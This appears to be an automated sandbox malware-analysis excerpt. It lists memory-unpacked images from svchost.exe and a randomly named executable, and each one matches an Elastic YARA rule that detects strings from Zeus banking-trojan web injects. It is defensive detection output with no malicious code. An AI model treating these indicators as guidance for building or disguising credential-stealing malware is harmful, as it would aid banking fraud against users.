Source: 2.3.svchost.exe.2d30000.61.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.29.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.50.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.46.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.73.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.67.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.63.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.64.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.39.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.NcYLgtXIKJgHj.exe.1740000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 16.2.NcYLgtXIKJgHj.exe.2792000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.NcYLgtXIKJgHj.exe.2202000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.67.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.NcYLgtXIKJgHj.exe.2652000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.41.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.56.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.21.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.40.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886c00.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.5450000.15.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.47.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.36.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.71.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.NcYLgtXIKJgHj.exe.14c2000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.NcYLgtXIKJgHj.exe.2eb0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.63.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.49.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.71.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
